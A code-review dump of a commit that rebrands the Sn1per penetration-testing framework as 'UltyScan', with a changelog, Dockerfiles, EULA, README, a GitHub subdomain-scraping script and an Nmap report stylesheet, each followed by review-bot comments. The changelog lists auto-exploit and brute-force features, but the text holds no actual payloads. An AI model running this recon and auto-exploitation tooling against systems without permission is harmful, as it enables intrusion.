* v2.4a - Added JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Metasploit exploit
* v2.4a - Added Java RMI RCE NMap/Metasploit detection
* v2.4a - Added INTEL-SA-00075 (Intel AMT) vulnerability NMap script
* v2.4 - Added detection for open X11 servers
* v2.4 - Added IIS6 Win2k3 RCE NMap script
* v2.4 - Added option to disable Google Hacking queries via Firefox
* v2.3d - Fixed issue with loot command
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes
* v2.2e - Changed NMap scan options (removed -P0 flag)
* v2.2d - Added MongoDB checks
* v2.2d - Improved NMap scanning options
* v2.2c - Added CouchDB checks
* v2.2c - Updated Sub-domain takeover list
* v2.2b - Added fullportonly mode to do exclusive full port scans
* v2.2b - Fixed minor issue with Metasploit Pro not starting
* v2.2b - Fixed minor issue with sniper loot command
* v2.2a - Fixed minor issue with loot function
* v2.2 - Added auto Metasploit Pro & Zenmap GUI integration
* v2.2 - Added Sn1per workspaces to loot directory
* v2.1d - Added crt.sh sub-domain check
* v2.1d - Removed blank screenshots from loot directory
* v2.1c - Fixed issue with install.sh install directories
* v2.1b - Added automatic Metasploit NMap xml imports for loot directory
* v2.1b - Removed Zenmap
* v2.1a - Separated Arachni reports for port 80/443/tcp
* v2.1a - Fixed NMap full port scan options
* v2.1 - Added Arachni with auto HTML web reporting (web mode only)
* v2.1 - Added full NMap detailed port scans
* v2.1 - Added port 4443/tcp checks
* v2.1 - Added META tag scans for web apps
* v2.1 - Removed Uniscan from web mode
* v2.1 - Removed SQLMap from web mode
* v2.0b - Added help option --help
* v2.0a - Fixed issue with ssh-audit
* v2.0a - Fixed issue with 'discover' mode
* v2.0 - Updated sub-domain takeover list
* v2.0 - Improved scan performance for stealth, airstrike and discover modes
* v2.0 - Removed jexboss due to clear screen issue with output
* v2.0 - Auto loot directory sorting for all tools
* v2.0 - Updated install.sh package list
* v1.9c - Enabled BruteX automated brute force attacks
* v1.9b - Fixed MSSQL port 1433/tcp port scan check (@hacktrack)
* v1.9a - Removed testssl script from stealth mode scans
* v1.9 - Added Ubuntu docker image for Sn1per (@menzow)
* v1.9 - Added automatic loot directory sorting for all modes
* v1.9 - Added MSSQL port 1433/tcp checks
* v1.9 - Added SNMP port 162/tcp checks (@hexageek)
* v1.9 - Added nslookup to install.sh
* v1.9 - Fixed install.sh dependency duplicates
* v1.8c - Added -A option to all NMap port scans
* v1.8c - Fixed install.sh permission issue
* v1.8c - Fixed install.sh cleanup options
* v1.8c - Added ssh-audit
* v1.8c - Added install directory (/usr/share/sniper/) to install script for universal access
* v1.8c - Fixed issue with Metasploit SSH scans
* v1.8c - Added auto-update to install.sh to automatically pull latest github release
* v1.8b - Fixed bug with NMap UDP scan options
* v1.8b - Fixed install.sh dependencies
* v1.8b - Fixed jexboss options
* v1.8a - Updated sub-domain hijack list of domains (CC: th3gundy)
* v1.8 - Added sub-domain hijack scans for all sub-domains
* v1.8 - Added auto explort of all sub-domains to /domains directory
* v1.8 - Added additional stealth and airstrike checks for port 80 and 443
* v1.8 - Fixed issue with theHarvester not working with google
* v1.7g - Added email security/spoofing checks
* v1.7f - Added Zenmap XML auto-imports
* v1.7f - Added ClamAV RCE Nmap script
* v1.7e - Fixed minor issue with airstrike and nuke mode
* v1.7e - Fixed minor issues with discover mode
* v1.7e - Added minor cosmetic improvements to reports
* v1.7e - Disabled automatic brute forcing by default
* v1.7e - Added automatic brute force setting in script vars
* v1.7d - Added sslyze
* v1.7d - Added 'discover' mode for full subnet scans
* v1.7d - Added verbosity to scan tasks to separate sub-tasks better
* v1.7c - Added plain text reporting
* v1.7c - Improved loot directory structure and sorting
* v1.7b - Fixed issue with airstrike mode not scanning correctly
* v1.7b - Improved passive recon performance
* v1.7a - Improved NMap http scan performance
* v1.7a - Removed joomscan due to verbosity issues
* v1.7 - Added uniscan web vulnerability scanner
* v1.7 - Added joomscan Joomla scanner
* v1.7 - Improved web scan performance
* v1.7 - Fixed issue with inurlbr output
* v1.7 - Added remote desktop viewing for RDP connections
* v1.7 - Added experimental Metasploit exploit for Apache Struts RCE (CVE-2016-3081)
* v1.6e - Added reporting option for nobrute mode (CC. @mero01)
* v1.6e - Improved SMB scan performance/optimization added
* v1.6d - Improved NMap scan performance options
* v1.6d - Added xprobe2 OS finger printing tool
* v1.6d - Added jexbos JBoss autopwn
* v1.6d - Merged fix for theharvester package (CC. @RubenRocha)
* v1.6d - Merged fix for SuperMicroScanner (CC. @mero01)
* v1.6c - Add report mode for web scans
* v1.6c - Fixed issues with Sublist3r and theharvester
* v1.6c - Added Shocker Shellshock exploitation scanner
* v1.6b - Added Sublist3r sub-domain brute tool
* v1.6b - Added cutycapt web screenshot util
* v1.6a - Added improvements to recon phase
* v1.6a - Fixed small issue with 3rd party extension
* v1.6a - Various improvements to overall optimization of scans
* v1.6a - Added new "web" mode for full web application scans
* v1.6 - Added 4 new modes including: stealth, port, airstrike and nuke
* v1.6 - Added Java de-serialization scanner
* v1.6 - Added reporting option to output to console and text file for all scans
* v1.6 - Added option to set Sn1per full path for universal command line access
* v1.6 - Added in DirBuster for web file brute forcing
* v1.6 - Fixed issue with sderr errors in TheHarvester
* v1.5e - Removed shodan command line tool due to issues
* v1.5e - Fixed wafwoof installation in kali 2.0
* v1.5d - Fixed minor issues with port 513/tmp and 514/tcp checks
* v1.5c - Fixed issue which broke link to sniper directory
* v1.5b - Added Squid Proxy checks port 3128/tcp
* v1.5b - Fixed shodan setup options in install.sh
* v1.5b - Fixed syntax error with theHarvester in install.sh
* v1.5a - Fixed syntax error with port 8081 checks
* v1.5a - Added Arachni integration
* v1.5a - Added vsftpd, proftpd, mysql, unrealircd auto exploits
* v1.5 - Added Metasploit scan and auto-exploit modules
* v1.5 - Added additional port checks
* v1.5 - Added full TCP/UDP NMap XML output
* v1.5 - Auto tune scan for either IP or hostname/domain
* v1.4h - Added auto IP/domain name scan configurations
* v1.4g - Added finger enumeration scripts
* v1.4g - Fixed nmap -p 445 target issue
* v1.4g - Fixed smtp-enum target issue
* v1.4f - Fixed BruteX directory bug
* v1.4e - Fixed reported errors install.sh
* v1.4e - Added auto-upgrade option to install.sh for existing Sn1per installs
* v1.4d - Fixed missing rake gem install dependency
* v1.4c - Reordered 3rd party extensions
* v1.4b - Fixed install.sh executable references
* v1.4b - Fixed Yasou dependencies in install.sh
* v1.4b - Fixed minor issues with BruteX loot directory
* v1.4 - Added Yasou for automatic web form brute forcing
* v1.4 - Added MassBleed for SSL vulnerability detection
* v1.4 - Added Breach-Miner for detection of breached accounts
* v1.4 - Fixed minor errors with nmap
* v1.4 - Removed debug output from goohak from displaying on console
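Review bot: several entries in this hunk carry spelling errors that users will read verbatim: "auto explort" (v1.8) should be "auto export", "jexbos" (v1.6d) should be "jexboss" as it is spelled in the v1.8b and v2.0 entries, "sderr" (v1.6) should be "stderr", "513/tmp" (v1.5d) should be "513/tcp", "finger printing" (v1.6d) should be "fingerprinting" and "wafwoof" (v1.5e) should be "wafw00f". The credit format also varies between "(CC. @name)", "(CC: name)" and "(@name)"; pick one form for the whole file. Since this commit renames the project to UltyScan while every entry here still refers to Sn1per and the `sniper` command, a short note at the top of the changelog explaining the lineage would save readers some confusion.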

34
Dockerfile Normal file

@@ -0,0 +1,34 @@
FROM docker.io/kalilinux/kali-rolling:latest
LABEL org.label-schema.name='Sn1per - Kali Linux' \
org.label-schema.description='Automated pentest framework for offensive security experts' \
org.label-schema.usage='https://github.com/1N3/Sn1per' \
org.label-schema.url='https://github.com/1N3/Sn1per' \
org.label-schema.vendor='https://sn1persecurity.com' \
org.label-schema.schema-version='1.0' \
org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \
MAINTAINER="@xer0dayz"
RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \
echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list
ENV DEBIAN_FRONTEND noninteractive
RUN set -x \
&& apt -yqq update \
&& apt -yqq full-upgrade \
&& apt clean
RUN apt install --yes metasploit-framework
RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \
service postgresql start && \
msfdb reinit
WORKDIR /usr/src/app
RUN apt --yes install git bash
RUN git clone https://github.com/1N3/Sn1per.git \
&& cd Sn1per \
&& ./install.sh \
&& sniper -u force
CMD ["sniper"]
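Review bot: the build is not reproducible and the database setup does not survive it. `git clone https://github.com/1N3/Sn1per.git` pulls whatever the default branch holds at build time, `sniper -u force` then updates it again, and the base image is `kali-rolling:latest`, so two builds of the same Dockerfile can ship different tool versions with no record of what was installed; pin a commit or tag in the clone (and ideally a base image digest). The `service postgresql start && msfdb reinit` step only runs inside the build layer; nothing starts PostgreSQL when the container later runs `CMD ["sniper"]`, so Metasploit will come up without its database unless an entrypoint starts the service first. Smaller points: `ENV DEBIAN_FRONTEND noninteractive` is the legacy space-separated form and persists into the running container (an `ARG DEBIAN_FRONTEND=noninteractive` scoped to the build is the usual fix), the trailing `MAINTAINER="@xer0dayz"` inside the `LABEL` continuation creates a label with a non-namespaced key, and the image still describes itself as 'Sn1per - Kali Linux' although the README in this commit renames the project to UltyScan.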

9
Dockerfile.blackarch Normal file

@@ -0,0 +1,9 @@
FROM docker.io/blackarchlinux/blackarch:latest
# Upgrade system
RUN pacman -Syu --noconfirm
# Install sn1per from official repository
RUN pacman -Sy sn1per --noconfirm
CMD ["sn1per"]
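Review bot: `RUN pacman -Sy sn1per --noconfirm` refreshes the package database in a separate layer without `-u`, which is the partial-upgrade pattern Arch-based distributions warn against; fold the install into the first RUN (`pacman -Syu --noconfirm sn1per`) so sync, upgrade and install happen together. The image also keeps the pacman package cache, so add a cleanup step to the same RUN. Note that this file ends with `CMD ["sn1per"]` while the Kali Dockerfile ends with `CMD ["sniper"]`; confirm which binary name the BlackArch package actually installs so both images start the same way.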

30
LICENSE.md Normal file

@@ -0,0 +1,30 @@
## LICENSE:
Sn1per Community Edition End User License Agreement (EULA)
Sn1perSecurity LLC grants you the right to download, use, and distribute in part or in whole Sn1per Community Edition (also referred to as “Project”, “Code”, “Software”, “Sn1per”, “Product”), provided the following terms and conditions are met:
(1) You agree to give credit to the original author @xer0dayz and link back to https://sn1persecurity.com (Sn1perSecurity LLC)
(2) You may not rename or rebrand the Project.
(3) You agree not to create any product or service from any par of the Code from this Project, paid or free.
(4) You agree not to re-license the Code.
(5) You may not use the Code for illegal or nefarious purposes, which violates any laws (in your jurisdiction, the jurisdiction in which the Software is running, the jurisdiction in which the Software is targeting, and the United States of America).
(6) You agree not to scan a target in a manner that is considered unlawful, illegal, or that you do not have explicit permission to do so.
This Software is provided as-is without warranty. Sn1perSecurity LLC, its creators and staff take no liability for consequential damages to the maximum extent permitted by all applicable laws. In no event shall Sn1perSecurity LLC or any person be liable for any consequential, reliance, incidental, special, direct or indirect damages whatsoever (including without limitation, damages for loss of business profits, business interruption, loss of business information, personal injury, or any other loss) arising out of or in connection with the use or inability to use this Product, even if Sn1perSecurity LLC has been advised of the possibility of such damages.
Sn1perSecurity LLC does not guarantee any functionality or performance of Sn1per Community Edition. Sn1perSecurity LLC does not warrant that the Code will be maintained and in good working order, or that the Software will meet your requirements, be uninterrupted, or error free, or that any errors in the Software will be corrected.
The Software code, name, and logos are owned by Sn1perSecurity LLC and protected by the United States of America and the state of Arizona copyright and/or patent laws of international treaty provisions. All rights reserved.
Sn1perSecurity LLC reserves the right to change the licensing terms at any time, without advance notice. Sn1perSecurity LLC reserves the right to terminate your license at any time.
If any provision of this EULA is determined to be unlawful, void, or unenforceable, such provision shall nonetheless be enforceable to the fullest extent permitted by applicable law, and the unenforceable portion shall be deemed to be severed from this EULA. Such determination shall not affect the validity and enforceability of any remaining provisions.
Failure of Sn1perSecurity LLC to exercise or enforce any right or provision of this EULA does not constitute a waiver of such right or provision.
Any ambiguities in the interpretation of this EULA shall not be construed against the drafting party/parties.
Download, use, distribution (in part or in whole) of this Project/Code constitutes your acceptance of the Sn1per Community Edition EULA. If at any time you are not in agreement or cannot meet any part of this EULA, you should immediately cease use of the Project by removing/uninstalling all copies from all locations.
For any questions concerning this EULA, please submit a GitHub issue with your question: https://github.com/1N3/Sn1per
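Review bot: clause (3) has a typo, "any par of the Code" should read "any part of the Code", and the ownership sentence reads "protected by the United States of America and the state of Arizona copyright and/or patent laws of international treaty provisions", where "of international treaty provisions" should presumably be "and/or international treaty provisions". Clause (6) mixes two constructions ("in a manner that is considered unlawful ... or that you do not have explicit permission to do so"); "or for which you do not have explicit permission" would make it parse. Substantively, clause (2) forbids renaming or rebranding the Project, yet the README added in this same commit presents the code as "UltyScan"; the maintainers should confirm they hold the right to rebrand before shipping this EULA alongside that README.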

51
README.md Normal file

@@ -0,0 +1,51 @@
# UltyScan
## Professional Attack Surface Management Platform
**UltyScan** is a next-generation automated information gathering and vulnerability scanning tool. It is designed to be the ultimate "button-pushing" solution for penetration testers and security professionals, automating the execution of dozens of powerful open-source tools to discover hidden assets and vulnerabilities.
### 🚀 Key Features
* **Automated Recon**: Automatically gathers subdomains, IPs, and open ports.
* **Vulnerability Scanning**: Integrates with tools like Nikto, Zap, and OpenVAS to find weaknesses.
* **Multiple Modes**: From "Stealth" (low profile) to "Nuke" (full aggressive audit).
* **Visual Reports**: Generates HTML reports with all findings, including screenshots.
* **Workspace Management**: Keeps different client data separate and organized.
---
### 📚 Documentation
For detailed instructions, please refer to our comprehensive guides:
* **[Installation Guide](docs/installation.md)**
* Step-by-step setup for Kali Linux, Ubuntu, and Docker.
* **[Usage Guide](docs/usage.md)**
* How to run scans, understand modes, and manage workspaces.
* **[Configuration Guide](docs/configuration.md)**
* Customizing the scanner and setting up API keys (Shodan, Censys, etc.).
---
### ⚡ Quick Start
1. **Install**:
```bash
git clone https://github.com/1N3/Sn1per
cd Sn1per
sudo bash install.sh
```
2. **Run a Basic Scan**:
```bash
sudo sniper -t example.com
```
3. **View Results**:
Open the generated HTML report inside the `loot/workspace/` directory.
---
### NOTE
This tool is for legal security auditing purposes only. Ensure you have permission to scan the target.
*Based on the open-source Sn1per project.*
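Review bot: the Quick Start contradicts the rest of the file. It clones `https://github.com/1N3/Sn1per`, runs `sudo bash install.sh` from that checkout and invokes `sudo sniper -t example.com`, so a reader following it installs upstream Sn1per rather than the repository this README belongs to; point the clone at this repository and the commands at whatever the installed binary is actually called. The three documentation links (`docs/installation.md`, `docs/usage.md`, `docs/configuration.md`) should be checked to exist in this commit, and the `loot/workspace/` path in step 3 should match the real workspace layout. Minor: "Zap" is normally written "ZAP" (OWASP ZAP), and the closing line "Based on the open-source Sn1per project" should state which version it derives from and under which terms, given the EULA in LICENSE.md in the same commit.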

137
bin/github-subdomains.py Normal file

@@ -0,0 +1,137 @@
#!/usr/bin/python3.5
# I don't believe in license.
# You can do whatever you want with this program.
import os
import sys
import re
import time
import requests
import random
import argparse
from functools import partial
from colored import fg, bg, attr
from multiprocessing.dummy import Pool
TOKENS_FILE = os.path.dirname(os.path.realpath(__file__))+'/.tokens'
def githubApiSearchCode( search, page ):
headers = {"Authorization":"token "+random.choice(t_tokens)}
url = 'https://api.github.com/search/code?s=indexed&type=Code&o=desc&q=' + search + '&page=' + str(page)
# print(url)
try:
r = requests.get( url, headers=headers, timeout=5 )
json = r.json()
return json
except Exception as e:
print( "%s[-] error occurred: %s%s" % (fg('red'),e,attr(0)) )
return False
def getRawUrl( result ):
raw_url = result['html_url'];
raw_url = raw_url.replace( 'https://github.com/', 'https://raw.githubusercontent.com/' )
raw_url = raw_url.replace( '/blob/', '/' )
return raw_url;
def readCode( regexp, source, result ):
url = getRawUrl( result )
code = doGetCode( url )
# print(code)
if code:
matches = re.findall( regexp, code )
if matches:
for sub in matches:
# print(sub)
sub = sub[0].replace('2F','').lower().strip()
if len(sub) and not sub in t_history:
t_history.append( sub )
sys.stdout.write( "%s" % sub )
if source:
sys.stdout.write( "\t-> %s" % result['html_url'] )
sys.stdout.write( "\n" )
def doGetCode( url ):
# print( url )
try:
r = requests.get( url, timeout=5 )
except Exception as e:
sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
return False
return r.text
parser = argparse.ArgumentParser()
parser.add_argument( "-t","--token",help="auth token (required)" )
parser.add_argument( "-d","--domain",help="domain you are looking for (required)" )
parser.add_argument( "-e","--extend",help="also look for <dummy>example.com", action="store_true" )
parser.add_argument( "-s","--source",help="display first url where subdomains are found", action="store_true" )
parser.parse_args()
args = parser.parse_args()
t_tokens = []
if args.token:
t_tokens = args.token.split(',')
else:
if os.path.isfile(TOKENS_FILE):
fp = open(TOKENS_FILE,'r')
t_tokens = fp.read().split("\n")
fp.close()
if not len(t_tokens):
parser.error( 'auth token is missing' )
if args.source:
_source = True
else:
_source = False
if args.domain:
_domain = args.domain
else:
parser.error( 'domain is missing' )
t_history = []
page = 1
_search = '"' + _domain + '"'
### this is a test, looks like we got more result that way
import tldextract
t_host_parse = tldextract.extract( _domain )
_search = '"' + t_host_parse.domain + '"'
# print( t_host_parse )
# exit()
###
# egrep -io "[0-9a-z_\-\.]+\.([0-9a-z_\-]+)?`echo $h|awk -F '.' '{print $(NF-1)}'`([0-9a-z_\-\.]+)?\.[a-z]{1,5}"
if args.extend:
# _regexp = r'[0-9a-zA-Z_\-\.]+' + _domain.replace('.','\.')
_regexp = r'([0-9a-z_\-\.]+\.([0-9a-z_\-]+)?'+t_host_parse.domain+'([0-9a-z_\-\.]+)?\.[a-z]{1,5})'
else:
_regexp = r'(([0-9a-zA-Z_\-\.]+)\.' + _domain.replace('.','\.')+')'
# print(_regexp)
# for page in range(1,10):
while True:
time.sleep( 1 )
t_json = githubApiSearchCode( _search, page )
# print(t_json)
page = page + 1
if not t_json or 'documentation_url' in t_json or not 'items' in t_json or not len(t_json['items']):
break
pool = Pool( 30 )
pool.map( partial(readCode,_regexp,_source), t_json['items'] )
pool.close()
pool.join()
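Review bot: token handling in this script is fragile. When `-t` is not given, `t_tokens = fp.read().split("\n")` keeps the trailing empty string from the file's final newline, so `random.choice(t_tokens)` periodically sends `Authorization: token ` with an empty value; those requests fail and, because the loop ends as soon as `'documentation_url' in t_json`, the search can stop early with no explanation. Filter blank lines (`[t for t in fp.read().splitlines() if t.strip()]`) and print the API message before breaking so the operator can tell a rate limit from an exhausted result set. The `.tokens` file is resolved next to the script, i.e. inside `bin/` in the repository, so it needs a `.gitignore` entry or live GitHub tokens will end up committed. Other points: the shebang `#!/usr/bin/python3.5` pins a long-EOL interpreter that most systems no longer ship (`#!/usr/bin/env python3`); `search` is concatenated into the query URL without `urllib.parse.quote`; `parser.parse_args()` is called twice; the non-raw strings `'\.'` and `'([0-9a-z_\-\.]+)?\.[a-z]{1,5})'` produce invalid-escape warnings on current Python, and `_domain` should go through `re.escape` rather than having only its dots escaped; and `readCode` runs from a 30-thread pool while doing an unsynchronised check-then-append on `t_history`, so duplicate subdomains can be printed (a set guarded by a lock fixes both).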

File diff suppressed because it is too large.

281
bin/nmap-bootstrap.xsl Normal file

@@ -0,0 +1,281 @@
<?xml version="1.0" encoding="utf-8"?>
<!--
Nmap Bootstrap XSL
Creative Commons BY-SA
Andreas Hontzia (@honze_net)
-->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="html" encoding="utf-8" indent="yes" doctype-system="about:legacy-compat"/>
<xsl:template match="/">
<html lang="en">
<head>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous"/>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous"/>
<link rel="stylesheet" type="text/css" href="https://cdn.datatables.net/1.10.19/css/dataTables.bootstrap.min.css"/>
<script src="https://code.jquery.com/jquery-3.3.1.js"></script>
<script src="https://cdn.datatables.net/1.10.19/js/jquery.dataTables.min.js"></script>
<script src="https://cdn.datatables.net/1.10.19/js/dataTables.bootstrap.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<style>
.target:before {
content: "";
display: block;
height: 50px;
margin: -20px 0 0;
}
@media only screen and (min-width:1900px) {
.container {
width: 1800px;
}
}
.footer {
margin-top:60px;
padding-top:60px;
width: 100%;
height: 180px;
background-color: #f5f5f5;
}
</style>
<title>Scan Report Nmap <xsl:value-of select="/nmaprun/@version"/></title>
</head>
<body>
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#"><span class="glyphicon glyphicon-home"></span></a>
</div>
<div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
<ul class="nav navbar-nav">
<li><a href="#scannedhosts">Scanned Hosts</a></li>
<li><a href="#onlinehosts">Online Hosts</a></li>
<li><a href="#openservices">Open Services</a></li>
</ul>
</div>
</div>
</nav>
<div class="container">
<div class="jumbotron">
<h1>Scan Report<br/><small>Nmap <xsl:value-of select="/nmaprun/@version"/></small></h1>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="/nmaprun/@args"/></pre>
<p class="lead">
<xsl:value-of select="/nmaprun/@startstr"/> <xsl:value-of select="/nmaprun/runstats/finished/@timestr"/><br/>
<xsl:value-of select="/nmaprun/runstats/hosts/@total"/> hosts scanned.
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/> hosts up.
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/> hosts down.
</p>
<div class="progress">
<div class="progress-bar progress-bar-success" style="width: 0%">
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@up div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
<xsl:value-of select="/nmaprun/runstats/hosts/@up"/>
<span class="sr-only"></span>
</div>
<div class="progress-bar progress-bar-danger" style="width: 0%">
<xsl:attribute name="style">width:<xsl:value-of select="/nmaprun/runstats/hosts/@down div /nmaprun/runstats/hosts/@total * 100"/>%;</xsl:attribute>
<xsl:value-of select="/nmaprun/runstats/hosts/@down"/>
<span class="sr-only"></span>
</div>
</div>
</div>
<h2 id="scannedhosts" class="target">Scanned Hosts<xsl:if test="/nmaprun/runstats/hosts/@down > 1024"><small> (offline hosts are hidden)</small></xsl:if></h2>
<div class="table-responsive">
<table id="table-overview" class="table table-striped dataTable" role="grid">
<thead>
<tr>
<th>State</th>
<th>Address</th>
<th>Hostname</th>
<th>TCP (open)</th>
<th>UDP (open)</th>
</tr>
</thead>
<tbody>
<xsl:choose>
<xsl:when test="/nmaprun/runstats/hosts/@down > 1024">
<xsl:for-each select="/nmaprun/host[status/@state='up']">
<tr>
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
<td><xsl:value-of select="address/@addr"/></td>
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
</tr>
</xsl:for-each>
</xsl:when>
<xsl:otherwise>
<xsl:for-each select="/nmaprun/host">
<tr>
<td><span class="label label-danger"><xsl:if test="status/@state='up'"><xsl:attribute name="class">label label-success</xsl:attribute></xsl:if><xsl:value-of select="status/@state"/></span></td>
<td><xsl:value-of select="address/@addr"/></td>
<td><xsl:value-of select="hostnames/hostname/@name"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='tcp'])"/></td>
<td><xsl:value-of select="count(ports/port[state/@state='open' and @protocol='udp'])"/></td>
</tr>
</xsl:for-each>
</xsl:otherwise>
</xsl:choose>
</tbody>
</table>
</div>
<script>
$(document).ready(function() {
$('#table-overview').DataTable();
});
</script>
<h2 id="onlinehosts" class="target">Online Hosts</h2>
<xsl:for-each select="/nmaprun/host[status/@state='up']">
<div class="panel panel-default">
<div class="panel-heading">
<h3 class="panel-title"><xsl:value-of select="address/@addr"/><xsl:if test="count(hostnames/hostname) > 0"> - <xsl:value-of select="hostnames/hostname/@name"/></xsl:if></h3>
</div>
<div class="panel-body">
<xsl:if test="count(hostnames/hostname) > 0">
<h4>Hostnames</h4>
<ul>
<xsl:for-each select="hostnames/hostname">
<li><xsl:value-of select="@name"/> (<xsl:value-of select="@type"/>)</li>
</xsl:for-each>
</ul>
</xsl:if>
<h4>Ports</h4>
<div class="table-responsive">
<table class="table table-bordered">
<thead>
<tr>
<th>Port</th>
<th>Protocol</th>
<th>State<br/>Reason</th>
<th>Service</th>
<th>Product</th>
<th>Version</th>
<th>Extra Info</th>
</tr>
</thead>
<tbody>
<xsl:for-each select="ports/port">
<xsl:choose>
<xsl:when test="state/@state = 'open'">
<tr class="success">
<td title="Port"><xsl:value-of select="@portid"/></td>
<td title="Protocol"><xsl:value-of select="@protocol"/></td>
<td title="State / Reason"><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td title="Service"><xsl:value-of select="service/@name"/></td>
<td title="Product"><xsl:value-of select="service/@product"/></td>
<td title="Version"><xsl:value-of select="service/@version"/></td>
<td title="Extra Info"><xsl:value-of select="service/@extrainfo"/></td>
</tr>
<tr>
<td colspan="7">
<a><xsl:attribute name="href">https://nvd.nist.gov/vuln/search/results?form_type=Advanced&amp;cves=on&amp;cpe_version=<xsl:value-of select="service/cpe"/></xsl:attribute><xsl:value-of select="service/cpe"/></a>
<xsl:for-each select="script">
<h5><xsl:value-of select="@id"/></h5>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
</xsl:for-each>
</td>
</tr>
</xsl:when>
<xsl:when test="state/@state = 'filtered'">
<tr class="warning">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:when>
<xsl:when test="state/@state = 'closed'">
<tr class="active">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:when>
<xsl:otherwise>
<tr class="info">
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="state/@state"/><br/><xsl:value-of select="state/@reason"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:otherwise>
</xsl:choose>
</xsl:for-each>
</tbody>
</table>
</div>
<xsl:if test="count(hostscript/script) > 0">
<h4>Host Script</h4>
</xsl:if>
<xsl:for-each select="hostscript/script">
<h5><xsl:value-of select="@id"/></h5>
<pre style="white-space:pre-wrap; word-wrap:break-word;"><xsl:value-of select="@output"/></pre>
</xsl:for-each>
</div>
</div>
</xsl:for-each>
<h2 id="openservices" class="target">Open Services</h2>
<div class="table-responsive">
<table id="table-services" class="table table-striped dataTable" role="grid">
<thead>
<tr>
<th>Address</th>
<th>Port</th>
<th>Protocol</th>
<th>Service</th>
<th>Product</th>
<th>Version</th>
<th>CPE</th>
<th>Extra info</th>
</tr>
</thead>
<tbody>
<xsl:for-each select="/nmaprun/host">
<xsl:for-each select="ports/port[state/@state='open']">
<tr>
<td><xsl:value-of select="../../address/@addr"/><xsl:if test="count(../../hostnames/hostname) > 0"> - <xsl:value-of select="../../hostnames/hostname/@name"/></xsl:if></td>
<td><xsl:value-of select="@portid"/></td>
<td><xsl:value-of select="@protocol"/></td>
<td><xsl:value-of select="service/@name"/></td>
<td><xsl:value-of select="service/@product"/></td>
<td><xsl:value-of select="service/@version"/></td>
<td><xsl:value-of select="service/cpe"/></td>
<td><xsl:value-of select="service/@extrainfo"/></td>
</tr>
</xsl:for-each>
</xsl:for-each>
</tbody>
</table>
</div>
<script>
$(document).ready(function() {
$('#table-services').DataTable();
});
</script>
</div>
<footer class="footer">
<div class="container">
<p class="text-muted">
This report was generated with <a href="https://github.com/honze-net/nmap-bootstrap-xsl">Nmap Bootstrap XSL</a>.<br/>
Licensed under <a href="https://creativecommons.org/licenses/by-sa/4.0/">Creative Commons BY-SA</a>.<br/>
